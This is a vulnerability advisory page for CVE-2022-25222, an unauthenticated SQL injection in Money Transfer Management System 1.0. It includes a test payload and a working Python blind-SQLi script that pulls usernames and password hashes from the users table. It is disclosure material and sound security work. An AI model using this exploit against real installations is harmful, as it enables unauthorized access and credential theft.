

Advisories

Money Transfer Management System 1.0 - Unauthenticated SQLi

7,5

High

Discovered by

Oscar Uribe

Offensive Team, Fluid Attacks

Summary

Full name

Money Transfer Management System - Unauthenticated SQL Injection

Code name

Berry

State

Public

Release date

15 mar 2022

Affected product

Money Transfer Management System

Affected version(s)

Version 1.0

Vulnerability name

SQL injection

Vulnerability type

146. SQL injection

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS v3.1 base score

7.5

Exploit available

Yes

CVE ID(s)

CVE-2022-25222

Description

Money Transfer Management System Version 1.0 allows an unauthenticated user to inject SQL queries in admin/maintenance/manage_branch.php and admin/maintenance/manage_fee.php via the id parameter.

Proof of Concept

Steps to reproduce

Go to http://127.0.0.1/mtms/admin/maintenance/manage_branch.php
Insert the following query inside the id parameter.
?id=1' and 1=1 -- -
The server response changes if the second part of the query is true or false. To automate the process use the below exploit.

System Information

Version: Money Transfer Management System version 1.0.
Operating System: Linux.
Web Server: Apache
PHP Version: 7.4
Database and version: MySQL

Exploit

import requests
import urllib.parse

dictionary = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~"""

def sqli_bool(base_url,query):


 url = "?id=1' and %s -- -" % query

 #proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}
 #r = requests.get(base_url+url, proxies=proxies)
 r = requests.get(base_url+url)

 if len(r.text) > 2700:
        return True

    else:
        return False


def get_length(url, query):

    for i in range(0,200):
        current_query = "(length((%s))=%s)"%(query,str(i))
        current_query = current_query=urllib.parse.quote(current_query)
        if sqli_bool(url,current_query):
            break

    if i !=199:
        return i
    else:
        return -1


def make_query(url,query):

    # Get length
    length = get_length(url,query)

    print("[*] Getting output length:")
    if length == -1:
        print("Error getting query length")
        return 0
    print("[+] Output Length: " + str(length))

    current_result = ""

    print()
    print("[*] Getting output: ")

    for pos in range(length+1):
        for char in dictionary:

            current_query = '(substr((%s),%s,1)="%s")' %(query,str(pos),requests.utils.quote(char))
            if sqli_bool(url,current_query):
                current_result += char
                print(current_result, end='\r')
                break

    print("[+] Found: " + " " * 100)
    print(current_result)


url = "http://127.0.0.1/mtms/admin/maintenance/manage_branch.php"

# must be only 1 row
# use limit and offset to iterate

# CHANGE THIS
query = "select concat(username,':', password) as t1 from users limit 1"

make_query(url,query)

Mitigation

By 2022-03-15 there is not a patch resolving the issue.

References

Vendor page https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

Timeline



IA generativa

15 feb 2022



Vendor contacted

15 feb 2022



Public disclosure

15 mar 2022

Inicia tu prueba gratuita de 21 días

Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.

Prueba gratis

Contactar a ventas

Inicia tu prueba gratuita de 21 días

Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.

Prueba gratis

Contactar a ventas

Inicia tu prueba gratuita de 21 días

Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.

Prueba gratis

Contactar a ventas

Solución

Planes

Recursos

Advisories

Compañía

Select Language



Contactar a ventas

Iniciar sesión

Prueba gratis

Select Language



Contactar a ventas

Prueba gratis

Solución

Planes

Recursos

Advisories

Compañía

Select Language



Contactar a ventas

Iniciar sesión

Prueba gratis

Select Language



Las soluciones de Fluid Attacks permiten a las organizaciones identificar, priorizar y remediar vulnerabilidades en su software a lo largo del SDLC. Con el apoyo de la IA, herramientas automatizadas y pentesters, Fluid Attacks acelera la mitigación de la exposición al riesgo de las empresas y fortalece su postura de ciberseguridad.